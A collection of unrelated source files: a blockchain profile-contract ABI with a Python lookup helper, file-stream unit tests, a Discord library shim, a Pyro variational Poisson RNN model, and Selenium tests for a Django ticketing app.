{"inputs":[],"name":"MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"UPDATER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"addressToProfile","outputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string[]","name":"_uriArray","type":"string[]"}],"name":"batchSetPicURI","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"string","name":"_name","type":"string"}],"name":"changeName","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"uint256","name":"_nftId","type":"uint256"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"changePic","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"uint256","name":"_nftId","type":"uint256"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"createProfile","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"}],"name":"getProfile","outputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"}],"name":"getProfileByAddress","outputs":[{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"address","name":"_owner","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"uint64","name":"_created","type":"uint64"},{"internalType":"uint8","name":"_picId","type":"uint8"},{"internalType":"uint256","name":"_heroId","type":"uint256"},{"internalType":"uint256","name":"_points","type":"uint256"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"_name","type":"string"}],"name":"getProfileByName","outputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile","name":"","type":"tuple"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_profileAddress","type":"address"},{"internalType":"uint256","name":"_collectionId","type":"uint256"}],"name":"getTokenUrisHeldByAddress","outputs":[{"internalType":"string[]","name":"","type":"string[]"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"heroesNftContract","outputs":[{"internalType":"contract IHeroCore","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"identityTokenRouter","outputs":[{"internalType":"contract IIdentityTokenRouter","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"address","name":"_heroCoreAddress","type":"address"},{"internalType":"address","name":"_identityTokenRouter","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[],"name":"maxChar","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"maxPic","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[],"name":"minChar","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"string","name":"","type":"string"}],"name":"nameToAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"picUris","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"setHeroes","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"address","name":"_identityTokenRouter","type":"address"}],"name":"setIdentityTokenRouter","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint8","name":"_min","type":"uint8"},{"internalType":"uint8","name":"_max","type":"uint8"}],"name":"setNameLengths","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint8","name":"_max","type":"uint8"}],"name":"setPicMax","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"uint256","name":"_picId","type":"uint256"},{"internalType":"string","name":"_picUri","type":"string"}],"name":"setPicURI","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"uint64","name":"created","type":"uint64"},{"internalType":"uint256","name":"nftId","type":"uint256"},{"internalType":"uint256","name":"collectionId","type":"uint256"},{"internalType":"string","name":"picUri","type":"string"}],"internalType":"struct ProfileTypes.Profile[]","name":"_profiles","type":"tuple[]"}],"name":"setProfiles","outputs":[],"stateMutability":"nonpayable","type":"function"},
{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}
]
"""
def get_profile(address, rpc_address):
w3 = Web3(Web3.HTTPProvider(rpc_address))
contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS)
contract = w3.eth.contract(contract_address, abi=ABI)
contract_entry = contract.functions.getProfileByAddress(Web3.toChecksumAddress(address)).call()
profile = {}
profile['id'] = contract_entry[0]
profile['address'] = str(contract_entry[1])
profile['name'] = contract_entry[2]
profile['creation_time'] = contract_entry[3]
profile['pic_id'] = contract_entry[4]
profile['hero_id'] = contract_entry[5]
profile['points'] = contract_entry[6]
return profile
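`getProfileByAddress` returns a positional tuple, and `get_profile` depends on that ordering. The mapping can be checked offline against a sample value; the tuple below is hypothetical test data, not real chain data, and `decode_profile` is an illustrative helper, not part of this module's API:

```python
# Field order of the getProfileByAddress return tuple, per the ABI above:
# (_id, _owner, _name, _created, _picId, _heroId, _points)
PROFILE_FIELDS = ('id', 'address', 'name', 'creation_time', 'pic_id', 'hero_id', 'points')

def decode_profile(contract_entry):
    """Map a raw contract tuple to the dict shape produced by get_profile."""
    profile = dict(zip(PROFILE_FIELDS, contract_entry))
    profile['address'] = str(profile['address'])
    return profile

# Hypothetical sample entry:
sample = (7, '0xAbC...', 'hero_fan', 1634499405, 2, 12345, 980)
print(decode_profile(sample)['name'])  # hero_fan
```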
# --- tests/core/streams/test_file.py (waterbutler, Apache-2.0) ---
import os
import pytest
from waterbutler.core import streams
DUMMY_FILE = os.path.join(os.path.dirname(__file__), 'fixtures/dummy.txt')
class TestFileStreamReader:
@pytest.mark.asyncio
async def test_file_stream_reader(self):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.FileStreamReader(fp)
assert reader.size == 27
data = await reader.read()
assert data == 'abcdefghijklmnopqrstuvwxyz\n'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
reader.close()
at_eof = reader.at_eof()
assert at_eof
with pytest.raises(ValueError):
fp.read()
@pytest.mark.asyncio
async def test_file_stream_reader_after_seek(self):
with open(DUMMY_FILE, 'r') as fp:
fp.seek(3)
reader = streams.FileStreamReader(fp)
assert reader.size == 27 # still gives full size
assert fp.tell() == 3 # returns to original seek position
data = await reader.read()
assert data == 'abcdefghijklmnopqrstuvwxyz\n' # always reads full data
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
@pytest.mark.asyncio
async def test_file_stream_reader_subset(self):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.FileStreamReader(fp)
data = await reader.read(10)
assert data == 'abcdefghij'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read(2)
assert data == 'kl'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == 'mnopqrstuvwxyz\n'
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
class TestPartialFileStreamReader:
@pytest.mark.asyncio
@pytest.mark.parametrize("byte_range,size,is_partial,content_range,expected", [
((0, 26), 27, False, 'bytes 0-26/27', 'abcdefghijklmnopqrstuvwxyz\n'),
((0, 5), 6, True, 'bytes 0-5/27', 'abcdef'),
((2, 10), 9, True, 'bytes 2-10/27', 'cdefghijk'),
((20, 26), 7, True, 'bytes 20-26/27', 'uvwxyz\n'),
((2, 2), 1, True, 'bytes 2-2/27', 'c'),
])
async def test_partial_file_stream_reader(self, byte_range, size, is_partial, content_range,
expected):
with open(DUMMY_FILE, 'r') as fp:
reader = streams.PartialFileStreamReader(fp, byte_range)
assert reader.size == size
assert reader.total_size == 27
assert reader.partial == is_partial
assert reader.content_range == content_range
data = await reader.read()
assert data == expected
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read()
assert data == b''
at_eof = reader.at_eof()
assert at_eof
@pytest.mark.asyncio
@pytest.mark.parametrize("byte_range,size,is_partial,content_range,expected", [
((0, 26), 27, False, 'bytes 0-26/27', 'abcdefghijklmnopqrstuvwxyz\n'),
((0, 5), 6, True, 'bytes 0-5/27', 'abcdef'),
((2, 10), 9, True, 'bytes 2-10/27', 'cdefghijk'),
((20, 26), 7, True, 'bytes 20-26/27', 'uvwxyz\n'),
((2, 2), 1, True, 'bytes 2-2/27', 'c'),
])
async def test_partial_file_stream_reader_with_size(self, byte_range, size, is_partial,
content_range, expected):
"""Test that range is respected even when large size values are passed to ``.read()``."""
with open(DUMMY_FILE, 'r') as fp:
reader = streams.PartialFileStreamReader(fp, byte_range)
assert reader.size == size
assert reader.total_size == 27
assert reader.partial == is_partial
assert reader.content_range == content_range
data = await reader.read(500)
assert data == expected
at_eof = reader.at_eof()
assert not at_eof
data = await reader.read(500)
assert data == b''
at_eof = reader.at_eof()
assert at_eof
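The `content_range` values in the parametrize tables follow the HTTP `bytes start-end/total` convention with an inclusive end index, which is why a (2, 10) range has size 9. The helper names below are illustrative only, not part of waterbutler's API:

```python
def content_range(start: int, end: int, total: int) -> str:
    """Render an inclusive byte range as an HTTP Content-Range value."""
    return 'bytes {}-{}/{}'.format(start, end, total)

def range_size(start: int, end: int) -> int:
    """Number of bytes covered by an inclusive range."""
    return end - start + 1

print(content_range(2, 10, 27))  # bytes 2-10/27
print(range_size(2, 10))         # 9
```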
# --- discord/types/appinfo.py (repo: kuzaku-developers/disnake, MIT) ---
from disnake.types.appinfo import *
from disnake.types.appinfo import __dict__ as __original_dict__
locals().update(__original_dict__)
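The shim above re-exports everything from `disnake.types.appinfo`, including underscore-prefixed names that a bare star-import skips, by copying the module's `__dict__`. The same effect can be demonstrated with a synthetic module (names below are made up for the demo):

```python
import types

# Build a stand-in source module to illustrate the re-export shim.
source = types.ModuleType("source_mod")
source.Thing = object
source._private = "kept too"

# Mirror of the shim: copy every attribute (including underscored ones,
# which `from source_mod import *` would not pick up) into another namespace.
target_namespace = {}
target_namespace.update(source.__dict__)

print("Thing" in target_namespace)     # True; a star-import would also cover this
print("_private" in target_namespace)  # True; this is why __dict__ is copied
```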
# --- src/algos/vprnn.py (repo: abacoelho/variational-poisson-rnn, MIT) ---
r"""
VP-RNN
-------
This file contains the VP-RNN and MOVP-RNN specifications. In particular, we implement:
(1) Emitter
Parametrizes the conditional output distribution p(x_t | \lambda_t) in the generative model (Eq.11, Section 3.2.4)
(2) Encoder:
    Parametrizes the encoder network q(\lambda_t | h^q_t) for posterior inference (Eq.11, Section 3.2.4)
(3) VPRNN:
(Single output) Variational Poisson-RNN (Section 3.2.4)
(4) MOVPRNN:
Multi-Output Variational Poisson-RNN (Section 4.1)
"""
import torch
from torch import nn
# pyro imports
import pyro
from pyro.infer import SVI, Trace_ELBO, Predictive
from pyro.optim import Adam, ClippedAdam
import pyro.distributions as dist
import pyro.poutine as poutine
from src.misc.utils import Trace_ELBO_Wrapper
class Emitter(nn.Module):
def __init__(self, input_dim, hidden_dim, output_dim):
super(Emitter, self).__init__()
# initialize linear transformations
self.lin_input_to_hidden = nn.Linear(input_dim, hidden_dim)
self.lin_hidden_to_hidden = nn.Linear(hidden_dim, hidden_dim)
self.lin_hidden_to_loc = nn.Linear(hidden_dim, output_dim)
self.lin_hidden_to_scale = nn.Linear(hidden_dim, output_dim)
# initialize non-linearities
self.relu = nn.ReLU()
self.dropout = nn.Dropout(p=0.1)
self.softplus = nn.Softplus()
def forward(self, x):
h = self.relu(self.lin_input_to_hidden(x))
h = self.dropout(h)
h = self.relu(self.lin_hidden_to_hidden(h))
h = self.dropout(h)
loc = self.lin_hidden_to_loc(h)
scale = self.softplus(self.lin_hidden_to_scale(h))
return loc, scale
class Encoder(nn.Module):
def __init__(self, input_dim, hidden_dim, output_dim):
super(Encoder, self).__init__()
# initialize linear transformations
self.lin_input_to_hidden = nn.Linear(input_dim, hidden_dim)
self.lin_hidden_to_hidden = nn.Linear(hidden_dim, hidden_dim)
self.lin_hidden_to_loc = nn.Linear(hidden_dim, output_dim)
self.lin_hidden_to_scale = nn.Linear(hidden_dim, output_dim)
# initialize non-linearities
self.relu = nn.ReLU()
self.softplus = nn.Softplus()
def forward(self, x):
h = self.relu(self.lin_input_to_hidden(x))
h = self.relu(self.lin_hidden_to_hidden(h))
loc = self.lin_hidden_to_loc(h)
scale = self.softplus(self.lin_hidden_to_scale(h))
return loc, scale
class VPRNN(nn.Module):
def __init__(self, input_dim=32, output_dim=1, p_model_dim=128, p_model_layers=1,
q_model_dim=128, q_model_layers=1, use_cuda=False, verbose=False):
super(VPRNN, self).__init__()
# initialize modules
self.emitter = Emitter(p_model_dim, 32, output_dim)
self.encoder = Encoder(q_model_dim, 32, output_dim)
self.p_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=p_model_dim,
num_layers=p_model_layers, batch_first=True, bidirectional=False)
self.q_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=q_model_dim,
num_layers=q_model_layers, batch_first=True, bidirectional=False)
# initialize learnable initial hidden states
self.h_0 = nn.Parameter(torch.zeros(p_model_dim))
self.q_h_0 = nn.Parameter(torch.zeros(q_model_dim))
self.use_cuda = use_cuda
self.input_dim = input_dim
self.output_dim = output_dim
self.p_model_dim = p_model_dim
self.q_model_dim = q_model_dim
self.verbose = verbose
if self.use_cuda:
self.cuda()
    def model(self, X=None, y=None, forecast=False):
        # get input shapes
        X = X[1:]
        T_max, D = X.shape[0], X.shape[1]
        # register parameters
        pyro.module("model", self)
        b = 1
        # initialize p_model hidden state
        h_prev = self.h_0.expand(b, self.h_0.size(0)).view(1, b, -1).contiguous()
        # initialize tensors to store results
        lambdas = torch.zeros((b, T_max, self.output_dim))
        x_samples = torch.zeros((b, T_max, self.output_dim))
        # extract feature embedding
        X_embedded = X
        # propagate p_model over time
        p_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
                                   y[:-1].view(b, T_max, self.output_dim)), dim=2)
        hidden_1_T, _ = self.p_model(p_model_input, h_prev)
        hidden_1_T = hidden_1_T.view(T_max, self.p_model_dim)
        # get mean and st.dev of the (log) rate
        log_lambda_loc, log_lambda_scale = self.emitter(hidden_1_T)
        assert log_lambda_loc.shape == (T_max, self.output_dim)
        with pyro.plate("data", T_max):
            # sample log_lambda ~ N(log_lambda | mu(x), sigma(x))
            log_lambda = pyro.sample("log_lambda",
                                     dist.Normal(log_lambda_loc, log_lambda_scale).to_event(1))
            lambdas[0] = torch.exp(log_lambda)
            # sample observations y ~ Poisson(exp(log_lambda))
            if forecast:
                obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda)).to_event(1),
                                  obs=None)
            else:
                obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda)).to_event(1),
                                  obs=y[1:, :])
        return lambdas, obs

    def guide(self, X=None, y=None, forecast=False):
        # get input shapes
        X = X[1:]
        T_max, D = X.shape[0], X.shape[1]
        # register parameters
        pyro.module("model", self)
        b = 1
        # initialize q_model hidden state
        q_h_prev = self.q_h_0.view(1, b, self.q_h_0.size(-1)).contiguous()
        # extract feature embedding
        X_embedded = X
        # propagate q_model over time
        q_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
                                   y[:-1].view(b, T_max, self.output_dim)), dim=2)
        q_hidden_1_T, _ = self.q_model(q_model_input, q_h_prev)
        q_hidden_1_T = q_hidden_1_T.view(T_max, self.q_model_dim)
        # get mean and st.dev of the (log) rate
        log_lambda_loc, log_lambda_scale = self.encoder(q_hidden_1_T)
        assert log_lambda_loc.shape == (T_max, self.output_dim)
        with pyro.plate("data", T_max):
            # sample log_lambda ~ N(log_lambda | mu(x), sigma(x))
            q_dist = dist.Normal(log_lambda_loc, log_lambda_scale)
            log_lambda = pyro.sample("log_lambda", q_dist.to_event(1))
        return log_lambda_loc, log_lambda_scale

    def _get_log_likelihood(self, X, y):
        trace_elbo = Trace_ELBO_Wrapper(num_particles=1)
        for model_trace, _ in trace_elbo._get_traces(self.model, self.guide, [X, y, True], {}):
            ll = -model_trace.nodes["obs"]["log_prob_sum"]
        return ll
class MOVPRNN(nn.Module):
    def __init__(self, input_dim=32, output_dim=3, p_model_dim=128, p_model_layers=1,
                 q_model_dim=128, q_model_layers=1, use_cuda=False, verbose=False):
        super(MOVPRNN, self).__init__()
        # initialize modules
        self.emitter = Emitter(p_model_dim, 32, output_dim)
        self.encoder = Encoder(q_model_dim, 32, output_dim)
        self.p_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=p_model_dim,
                              num_layers=p_model_layers, batch_first=True, bidirectional=False)
        self.q_model = nn.GRU(input_size=input_dim + output_dim, hidden_size=q_model_dim,
                              num_layers=q_model_layers, batch_first=True, bidirectional=False)
        # initialize learnable initial hidden states
        self.h_0 = nn.Parameter(torch.zeros(p_model_dim))
        self.q_h_0 = nn.Parameter(torch.zeros(q_model_dim))
        self.use_cuda = use_cuda
        self.input_dim = input_dim
        self.output_dim = output_dim
        self.p_model_dim = p_model_dim
        self.q_model_dim = q_model_dim
        self.verbose = verbose
        if self.use_cuda:
            self.cuda()

    def model(self, X=None, y=None, forecast=False):
        # get input shapes
        X = X[1:]
        T_max, D = X.shape[0], X.shape[1]
        # register parameters
        pyro.module("model", self)
        b = 1
        # initialize p_model hidden state
        h_prev = self.h_0.expand(b, self.h_0.size(0)).view(1, b, -1).contiguous()
        # initialize tensors to store results
        lambdas = torch.zeros((b, T_max, self.output_dim))
        x_samples = torch.zeros((b, T_max, self.output_dim))
        # extract feature embedding
        X_embedded = X
        # propagate p_model over time
        p_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
                                   y[:-1].view(b, T_max, self.output_dim)), dim=2)
        hidden_1_T, _ = self.p_model(p_model_input, h_prev)
        hidden_1_T = hidden_1_T.view(T_max, self.p_model_dim)
        # get mean and st.dev of the (log) rate
        log_lambda_loc, log_lambda_scale = self.emitter(hidden_1_T)
        assert log_lambda_loc.shape == (T_max, self.output_dim)
        with pyro.plate("data", T_max):
            # sample log_lambda ~ N(log_lambda | mu(x), sigma(x))
            log_lambda = pyro.sample("log_lambda",
                                     dist.Normal(log_lambda_loc, log_lambda_scale).to_event(1))
            # only the first two outputs are observed Poisson rates here
            lambdas[0, :, :2] = torch.exp(log_lambda[:, :2])
            # sample observations y ~ Poisson(exp(log_lambda))
            if forecast:
                obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda[:, :2])).to_event(1),
                                  obs=None)
            else:
                obs = pyro.sample("obs", dist.Poisson(torch.exp(log_lambda[:, :2])).to_event(1),
                                  obs=y[1:, :2])
        return lambdas, obs

    def guide(self, X=None, y=None, forecast=False):
        # get input shapes
        X = X[1:]
        T_max, D = X.shape[0], X.shape[1]
        # register parameters
        pyro.module("model", self)
        b = 1
        # initialize q_model hidden state
        q_h_prev = self.q_h_0.view(1, b, self.q_h_0.size(-1)).contiguous()
        # extract feature embedding
        X_embedded = X
        # propagate q_model over time
        q_model_input = torch.cat((X_embedded.view(b, T_max, self.input_dim),
                                   y[:-1].view(b, T_max, self.output_dim)), dim=2)
        q_hidden_1_T, _ = self.q_model(q_model_input, q_h_prev)
        q_hidden_1_T = q_hidden_1_T.view(T_max, self.q_model_dim)
        # get mean and st.dev of the (log) rate
        log_lambda_loc, log_lambda_scale = self.encoder(q_hidden_1_T)
        assert log_lambda_loc.shape == (T_max, self.output_dim)
        with pyro.plate("data", T_max):
            # sample log_lambda ~ N(log_lambda | mu(x), sigma(x))
            q_dist = dist.Normal(log_lambda_loc, log_lambda_scale)
            log_lambda = pyro.sample("log_lambda", q_dist.to_event(1))
        return log_lambda_loc, log_lambda_scale

    def _get_log_likelihood(self, X, y):
        trace_elbo = Trace_ELBO_Wrapper(num_particles=1)
        for model_trace, _ in trace_elbo._get_traces(self.model, self.guide, [X, y, True], {}):
            ll = -model_trace.nodes["obs"]["log_prob_sum"]
        return ll
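For orientation, the generative story both `model` methods above encode — a log-rate drawn from a Normal, counts drawn from a Poisson with that rate — can be sketched with numpy alone. The shapes and parameter values below are illustrative assumptions, not taken from the trained model:

```python
import numpy as np

rng = np.random.default_rng(0)

def generate_counts(loc, scale):
    # log_lambda ~ Normal(loc, scale); y ~ Poisson(exp(log_lambda))
    log_lam = rng.normal(loc, scale)
    lam = np.exp(log_lam)
    return lam, rng.poisson(lam)

T_max, output_dim = 10, 3  # illustrative sizes only
loc = np.zeros((T_max, output_dim))
scale = 0.1 * np.ones((T_max, output_dim))
lam, y = generate_counts(loc, scale)
assert lam.shape == y.shape == (T_max, output_dim)
assert (y >= 0).all() and (lam > 0).all()
```

In the Pyro model the `loc` and `scale` come from the emitter network conditioned on the GRU hidden state, rather than being fixed as here.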
# --- simpleTicket/siteEngine/tests.py (repo: abogeorge/simpleTicket, license: MIT) ---

from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from . import entities_utils
import unittest, time, re
class SiteEngineTests(StaticLiveServerTestCase):
    id_ticket = 22
    id_order = 19
    fixtures = ['user-data.json']

    # --- Set Up and Tear Down Methods ---

    # Set Up
    @classmethod
    def setUpClass(cls):
        super(SiteEngineTests, cls).setUpClass()
        cls.driver = webdriver.Chrome()
        print("Initialized Chrome Driver ... ")

    # Tear Down
    @classmethod
    def tearDownClass(cls):
        print(" ... Destroying Resources")
        cls.driver.quit()
        super(SiteEngineTests, cls).tearDownClass()

    # --- Utility methods ---

    # Returns True if an element is identified
    def __is_element_present(self, how, what):
        try:
            self.driver.find_element(by=how, value=what)
        except NoSuchElementException:
            return False
        return True

    # Returns True if the text is identified
    def __is_text_present(self, text):
        values = self.driver.find_elements_by_xpath(
            "//*[contains(text(), '" + text + "')]")
        return len(values) > 0
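`__is_text_present` leans on Selenium's XPath `contains()` search over the live page. The same idea, sketched stdlib-only with `xml.etree` against a toy document (a hypothetical helper for illustration, not part of the test suite):

```python
import xml.etree.ElementTree as ET

def is_text_present(root, text):
    # Walk every element and report whether any element's text contains `text`.
    return any(elem.text and text in elem.text for elem in root.iter())

page = ET.fromstring(
    "<html><body><p>simpleTicket is a new self-service app</p></body></html>")
assert is_text_present(page, "self-service")
assert not is_text_present(page, "Invalid Username")
```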
    # --- Test Methods ---

    # Test successful Login
    def test1_login(self):
        print("Testing user login ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        # Asserting False auth error message
        self.assertFalse(self.__is_text_present("Invalid Username or Password provided! Please try again!"))
        # Asserting True index page element
        self.assertTrue(self.__is_element_present("name", "our-services"))

    # Test unsuccessful Login
    def test2_bad_login(self):
        print("Testing wrong password user login ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('bad_password')
        driver.find_element_by_name('Submit').click()
        # Asserting True auth error message
        self.assertTrue(self.__is_text_present("Invalid Username or Password provided! Please try again!"))
        # Asserting False index page text
        self.assertFalse(self.__is_text_present("simpleTicket is a new self-service app that uses"))

    # Test Index/Logout
    def test3_logout(self):
        print("Testing user logout ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('logout').click()
        # Asserting True logout page text
        self.assertTrue(self.__is_text_present("You Have Successfully Logged out of simpleTicket!"))
    # Test Index/MyAccount
    def test4_myaccount(self):
        print("Testing user MyAccount ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('myaccount').click()
        # Asserting True MyAccount page text information
        self.assertTrue(self.__is_text_present("Personal Information"))
        self.assertTrue(self.__is_text_present("George"))
        self.assertTrue(self.__is_text_present("Rus"))
        self.assertTrue(self.__is_text_present("Cornel Popescu"))

    # Test Index/Services
    def test5_services(self):
        print("Testing user Services ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Create Ticket"))
        self.assertTrue(self.__is_text_present("Create a new Ticket"))
        self.assertTrue(self.__is_text_present("If you need any assistance while creating an IT Ticket or placing any kind of order please contact our HelpDesk team."))

    # Test Index/Contact
    def test6_contact(self):
        print("Testing user Contact ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('george.r')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('rgeotest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('contact').click()
        # Asserting True Contact page text information
        self.assertTrue(self.__is_text_present("Contact the HelpDesk Team"))
        self.assertTrue(self.__is_text_present("Send an e-mail"))
    # Test LogIn user/Index/Services/Create Ticket
    def test7_user_create_ticket(self):
        print("Testing user create ticket ... ")
        driver = self.driver
        driver.get("http://127.0.0.1:8000/home/login/")
        username_input = driver.find_element_by_name("username")
        username_input.send_keys('cristina.g')
        password_input = driver.find_element_by_name("password")
        password_input.send_keys('gcritest123')
        driver.find_element_by_name('Submit').click()
        # Asserting True index page text
        self.assertTrue(self.__is_text_present("simpleTicket is a new self-service app that uses"))
        driver.find_element_by_name('services').click()
        # Asserting True Services page text information
        self.assertTrue(self.__is_text_present("Create Ticket"))
        driver.find_element_by_name('create_ticket').click()
        # Asserting True Create Ticket page text information
        self.assertTrue(self.__is_text_present("Create a Ticket"))
        # Populating form inputs
        category_select = Select(driver.find_element_by_id('type'))
        category_select.select_by_visible_text('Software Problem')
        title_input = driver.find_element_by_name("title")
        title_input.send_keys('Office License')
        description_input = driver.find_element_by_name("description")
        description_input.send_keys('MS 2010 Office license has expired.')
        priority_select = Select(driver.find_element_by_id('priority'))
        priority_select.select_by_visible_text('Medium Priority')
        driver.find_element_by_name('submit').click()
        # Asserting True confirmation message
        self.assertTrue(self.__is_text_present("Ticket successfully created! You will be contacted as soon as possible."))

